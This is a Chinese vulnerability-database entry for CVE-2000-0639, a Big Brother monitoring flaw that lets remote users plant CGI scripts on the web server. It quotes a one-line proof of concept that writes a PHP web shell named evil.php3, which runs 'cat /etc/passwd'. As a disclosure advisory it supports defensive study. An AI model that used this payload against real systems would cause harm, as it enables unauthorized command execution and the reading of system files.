Big Brother命令任意执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106380 漏洞类型 未知
发布时间 2001-06-11 更新时间 2005-05-02
CVE编号 CVE-2000-0639 CNNVD-ID CNNVD-200006-052
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20092
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-052
|漏洞详情
BigBrother1.4h2版本和更早的版本的默认配置不包含正确的访问限制。远程攻击者通过使用bbd上传文件可以执行任意命令,该文件的扩展导致其被web服务器当做CGI脚本执行。
|漏洞EXP
source: http://www.securityfocus.com/bid/1494/info

A vulnerability in Big Brother exists which would allow a user to remotely create CGI scripts which could be requested from the Web Server. These could be used to read files and possibly execute commands on the web server machine. 

./bb 1.2.3.4 "status evil.php3 <?<system(\"cat /etc/passwd\");?>"

will allow viewing of the /etc/passwd upon browsing to http://1.2.3.4/bb/logs/evil.php3.
|参考资料

来源:BUGTRAQ
名称:20000711BigBrotherfilenameextensionvulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2000-07/0171.html
来源:BID
名称:1494
链接:http://www.securityfocus.com/bid/1494
来源:XF
名称:big-brother-filename-extension
链接:http://xforce.iss.net/static/5103.php
来源:OSVDB
名称:1472
链接:http://www.osvdb.org/1472